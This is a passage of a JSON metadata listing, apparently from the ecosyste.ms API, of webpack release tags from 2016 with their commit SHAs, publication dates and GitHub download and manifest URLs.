ttps://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com